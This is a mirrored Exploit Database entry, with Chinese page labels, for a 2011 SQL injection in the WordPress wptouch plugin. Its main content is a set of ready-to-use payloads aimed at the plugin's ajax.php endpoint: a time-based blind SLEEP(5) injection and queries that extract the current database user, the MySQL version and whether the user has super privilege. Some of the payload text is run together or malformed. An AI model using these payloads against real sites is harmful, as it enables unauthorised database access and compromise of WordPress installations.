WordPress Plugin wptouch – SQL Injection

• Exploit Database
• 107 阅读

• 作者： longrifle0x
  日期： 2011-10-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18039/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

  # Exploit Title: WordPress wptouch plugin SQL Injection Vulnerability # Date: 2011-27-10 # Author: longrifle0x # software: WordPress # Tools: SQLMAP --------------- (POST data) ---------------   http://www.site.com/wp-content/plugins/wptouch/ajax.php   #Exploit: id=-1; id=- AND SLEEP(5) or 1=if   http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][CURRENT_USER()   http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)   http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][MID((VERSION()),1,6)